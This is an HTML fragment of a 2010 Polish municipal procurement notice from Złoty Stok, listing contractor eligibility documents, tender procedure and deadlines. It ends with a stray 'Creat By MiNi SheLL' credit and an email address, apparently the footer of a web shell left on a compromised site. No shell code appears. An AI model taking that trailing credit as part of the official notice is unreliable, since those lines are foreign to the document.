<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenia wynikające ze SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlotystok.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
pok. 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2010 godzina 10:00, miejsce: Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
sekretariat urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com